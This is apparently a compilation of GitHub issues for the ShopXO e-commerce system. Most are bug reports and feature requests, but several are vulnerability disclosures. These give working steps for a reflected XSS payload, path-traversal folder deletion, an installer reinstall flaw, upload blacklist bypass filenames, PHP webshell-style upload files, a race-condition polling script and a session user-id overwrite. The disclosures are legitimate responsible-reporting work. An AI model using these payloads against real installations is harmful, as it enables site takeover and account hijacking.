After the template file of ‘index.php?s=order/index' is parsed, there is a controllable variable here.


By using payload index.php?s=order&ids="><script>alert(1);</script> ,we can get an xss alert.But it need anyone is logining,so hacker can get user's cookies when they visit the evil link.

比如商品库存剩1，A和B同时读取到，一起下单，结果库存变成-1。

我粗略看了一下源码，貌似没有看到加锁的部分。

后台删除文件处由于没有对文件名做校验导致可以通过../进行回溯来删除任意文件夹，删除install文件(锁文件所在的文件夹)时，可以重装系统
在Appminialipaylist.php文件中，params是受控制的：

进入delete方法中，当不是zip结尾时会认为是文件夹

跟进FileUtil.php文件UnlinkDir方法中

方法中只对是不是文件夹做了校验，最后进入了rmdir方法中

点击删除

抓包修改

成功删除

您好：
我是360代码卫士的工作人员，在我们的开源代码审计过程中，发现shopxo存在系统重装漏洞，详细信息如下：
在shopxo\application\install\controller\Index.php文件中，Add方法中没有校验锁文件，导致攻击者可以重装数据库。

构造如下post请求

可以发现本地数据库中新建了一个shopxo2的数据库，实际场景中攻击者可以在自己额公网服务器中的数据库开启远程连接，连上自己的数据库

最关键的地方是数据库配置文件也修改了

这个地方可以通过写入php代码来getshell，由于是在github上，详细信息就不具体说了，如果您对后面getshell的方法流程感兴趣，很乐意通过邮件告诉您

重现步骤:

1. 在商品管理下面新增分类
2. 到品牌管理增加一个品牌
3. 问题: 当设定品牌所属分类时, 只有之前的分类.

查找了原因，发现使用CDN后，使用系统内置函数 GetClientIP 获取到的用户IP为：
218.17.xx.xx,218.93.204.51,36.42.75.103
变成了逗号分隔的三段式，后两个均为CDN的节点IP。

$ips = explode(',' $onlineip);
建议 return reset($ips);

后台管理: 网站管理 -> 导航管理 抛出未定义数组索引: items 错误

我下载并解压源代码到我本地的Ubuntu系统里,并且我安装了PHP 7.2.19-0ubuntu0.18.04.2 (cli) (built: Aug 12 2019 19:34:28) ( NTS ), 我通过在shopxo代码所在目录运行 php -S 127.0.0.1:8001 启动了一个本地服务,浏览器里访问 http://127.0.0.1:8001/public/index.php?s=/install/index/index 却遇到Fatal error: Call to undefined function mb_substr(),请我应该如何正确安装呢?

支付宝有演示的吗？我在支付宝小程序里没有搜索到shopxo

as title

bug: 退款时选择了理由后立即提示：请选择退款理由

作者你好，如何关闭移动端，手机访问只显示PC端

当面付可以不用营业执照

$value{0}写法要改成$value[0] 否则会报错。

我看了很久index模块下user控制器下index方法里面有很多钩子，没看到有什么效果，很迷惑。

涉及到数据库事务的代码, 有点乱~~~

看这里application/service/OrderService.php:399
`Db::startTrans();

    // 消息通知
    $detail = '订单支付成功，金额'.PriceBeautify($params['order']['total_price']).'元';
    MessageService::MessageAdd($params['order']['user_id'], '订单支付', $detail, 1, $params['order']['id']);

    // 更新订单状态
    $upd_data = array(
        'status'        => 2,
        'pay_status'    => 1,
        'pay_price'     => $pay_price,
        'payment_id'    => $params['payment']['id'],
        'pay_time'      => time(),
        'upd_time'      => time(),
    );
    if(Db::name('Order')->where(['id'=>$params['order']['id']])->update($upd_data))
    {
        // 添加状态日志
        if(self::OrderHistoryAdd($params['order']['id'], 2, $params['order']['status'], '支付', 0, '系统'))
        {
            // 库存扣除
            $ret = BuyService::OrderInventoryDeduct(['order_id'=>$params['order']['id'], 'order_data'=>$upd_data]);
            if($ret['code'] != 0)
            {
                // 事务回滚
                Db::rollback();
                return DataReturn($ret['msg'], -10);
            }

            // 提交事务
            Db::commit();
            return DataReturn('支付成功', 0);
        }
    }

    // 事务回滚
    Db::rollback();`

点击后台，站点设置，网站搜索，搜索，扩展均报错。

how can i diy coupon price for goods

Whether this system can make a fuss about financial analysis, or as part of an invoicing system, I mainly want to add some elements of financial analysis.

http://www.caict.ac.cn/kxyj/qwfb/ztbg/201905/P020190528556912534746.pdf

2.2.0 从github安装后，购买商品时，选择商品规格报错： 商品id有误。订单提交后报错：商品信息为空

商品预售（预约），定金支付、定金抵扣（定金翻倍功能）。

The file upload vulnerability here lies in the blacklist method used when verifying the suffix of the uploaded file. This verification method is not strict and is often bypassed by attackers in various ways
The PluginsUpload method in the application\service\PluginsAdminService.php file has a file creation operation, in which the input of the file_put_contents function is controllable

Line 1072 checks the file suffix name, here is the blacklist check

The value in the private static variable $exclude_ext is ‘.php’, which can easily be bypassed

There are many ways to bypass the blacklist verification of suffix names. Taking my local Windows system environment as an example, you can upload file names that do not conform to the Windows file naming rules

shell.php::$DATA
shell.php::$DATA…….
shell.php.
shell.php(空格)
shell.php:1.jpg

The windows system will automatically remove the content behind the symbols that do not conform to the rules. You can change the file suffix in the linux environment and upload it to the website
Through the audit of the PluginsUpload method in the PluginsAdminService.php file
When the zip archive does not match the resource directory, it will jump out of the loop of reading the archive file



And the resource directory cannot be controller, because the directory corresponding to controller exists, and the compressed package will be closed directly without entering the subsequent file writing operation

Finally, the method is called in the Upload method of the application\admin\controller\Pluginsadmin.php file

The attacker can upload such a compressed package after logging into the background system

And upload the compressed package at Application Center -> Application Management -> Upload Application

Visit public\static\upload\file_uploadfile_\shell.php

In application\service\ThemeService.php there is also the same blacklist verification problem for uploaded files

The processing logic is very similar to the above file
After logging in to the system, upload the zip archive at the site management -> theme management -> theme installation

Visit public\static\index\test.php after uploading

application/service/PaymentService.php 153 $payment 三元运算符 :后面是否是空字符串，现在是$payment

如题。

Feature Request: 添加微信地址一键导入功能

点击个人中心是提出alert框：百度未授权使用地图API，可能是因为您提供的密钥不是有效的百度LBS开放平台密钥，或此密钥未对本应用的百度地图JavaScriptAPI授权。您可以访问如下网址了解如何获取有效的密钥：http://lbsyun.baidu.com/apiconsole/key#
请问如何解决呢？

When uploading payment plug-ins, attackers can bypass file verification and upload malicious php files by constructing the code of the php file in the zip compression package. Even uploading the php file without constructing the code will trigger the file containment vulnerability or upload files through competitive upload
In the Upload method in the application\service\PaymentService.php file, the file_put_contents function parameter is controllable

But later call GetPaymentConfig method to do file verification, if the file verification is not passed, the file will be deleted
In the GetPaymentConfig method, the class_exists function checks whether the class is defined, the class uses the fully qualified name, and then it checks whether there are three methods defined in the class

According to this, the attacker only needs to define a class in the PHP file, define the namespace, and define the three methods mentioned above in order to pass the verification. The complete code is as follows:

<?php 
namespace payment;
class a{
public function __construct($params = [])
    {
        phpinfo();
    }
public function Config()
    {
    }
public function Pay()
    {
    }
public function Respond()
    {
    }
}
$b=new a();
?>

Finally, the method is called in application\admin\controller\Payment.php

After logging in to the background, upload the zip package containing a.php at the site management -> payment method -> upload

Visit extend/payment/a.php

Not by constructing code:
The first is file inclusion. The class_exists function will call the autoload function by default. The definition of the autoload function is found in /thinkphp/library/think/Loader.php

findFile is the function of thinkphp to find files. It is mainly loaded through psr-4 and classmap. The fully qualified name of the class we passed in is returned by the findFile function and finally spliced into the complete file path.

Finally, the autoload function calls the __include_file function, and this function directly performs the file include operation

At this point, we have not entered the following file deletion operation but included the file, and the code will also be executed.

Upload the zip archive containing the php file at the same location, the code content is:
<?php $f = '1.php'; $shell = '<?php phpinfo(); ?>'; file_put_contents($f,$shell); ?>
Although the upload failed message is returned after uploading, the code has been included and executed
The file is created in 1.php under the root directory of shopxo installation, visit 1.php

There are also problems with uploading files and then deleting files. If there is no file included here, there is another way to upload files is competitive upload, because there is a time difference from file verification to file deletion, and you can keep uploading while keeping access.
I use burpsuite's intruder module to keep sending packages and python scripts to keep accessing

The Python script is as follows:

import requests
url='http://url/extend/payment/2.php'
while True:
	s=requests.get(url)
	if 'phpinfo' in s.text:
		print(s.text)
		exit()

Upload the php file in the compressed package as follows:

<?php 
phpinfo(); 
$f = '1.php'; 
$shell = '<?php phpinfo(); ?>'; 
file_put_contents($f,$shell);
?>

The generated php file is in the extend\payment directory
Visit extend\payment\1.php

首先给你们点个赞，相当好的项目，整洁清晰，甩其他开源项目好几条街。

有没有试过在plesk上部署？按照教程部署完之后，直接炸了，连plesk也打不开了，"Err_Connection_Refused", 连ssh也连不上机器，重启后一直崩溃无法连接。。。
后来重新试了一两个新机器，目前稳定的设置以下

OS:

ubuntu 18, cpu x 1, ram x 2gb

plesk:

Plesk Obsidian 18.0.20

php:

7.3.11, FPM application served by nginx

DB:

Mariadb 10

ssl:

lets encrypt

问题好像出在将runtime文件夹设置为777，因该在cache上出了点问题，不知道怎么直接把plesk给炸了。plesk上的所有网站都无法响应了"Err_Connection_Refused"，但是还可以通过8443端口连接到后台，然后显示apache和nginx服务都正常运行，cpu高峰才47%，ram最高490mb。。。瞎折腾一番结果连8443端口也炸了，ssh也无法连接。。。幸好是台dev机器。。。
后来删了重装plesk，再次部署shopxo1.7，没有设置runtime权限，保留其原来权限755，目前网站后台（admin.php）只崩溃过几次，499，503，504，也没有波及到plesk及其他网站。

由于之前机器完全废了，所以提供不了更多信息，目前在不设置runtime777的情况下还是稳定的，要是再崩溃的话，我会提供更多信息。

APPLICATION、$params['user_id']可以被用户控制，存在变量覆盖问题。

利用修改头像接口
1、添加参数application=app跟参数user_id，导致$params['user_id']用户id变成用户指定id

2、进入UserLoginRecord方法，这里好像没啥问题

3、进入UserAvatarUpload方法，这里完成图片上传后又调用了UserLoginRecord方法

4、再进入UserLoginRecord方法。因为这次调用没有指定$is_app，默认为false

这就导致了最终结果变成当前session存储的用户变成用户指定的任意用户id，并且这个id是一个可以猜测的简单数字
5、最终效果

You previously fixed one vulnerability of the theme file upload .

But now there is a similar vulnerability in /app/admin/appmini.php,because you didn't use the above method.

http://localhost:3000/admin.php?s=appmini/index/nav_type/weixin/view_type/upload.html


Then my file will be uploaded to sourcecode/weixin/

And i can bypass the !IS_AJAX，even upload my files to any writable directory using ../.
admin.php?s=appmini/themeupload&ajax=ajax

安装的时候提示 Array and string offset access syntax with curly braces is deprecated

都有200k大

商品编辑页面没有修改库存数量的地方，默认的库存为0

有支持第三方入驻的计划么，类似京东这样的。

把 application\lang\zh-cn.php   369行的 '^1((3|5|8|7){1}\d{1})\d{8}$'替换为以下 ^1([358][0-9]|4[579]|66|7[0135678]|9[89])[0-9]{8}$

毕竟已经不维护了

shopxo/application/install/view/index/check.html

第11、62、360行

<th width="25%">坏境</th>

字错了

Hey there!

I'd like to report a security issue but cannot find contact instructions on your repository.

If not a hassle, might you kindly add a SECURITY.md file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.

Thank you for your consideration, and I look forward to hearing from you!

(cc @huntr-helper)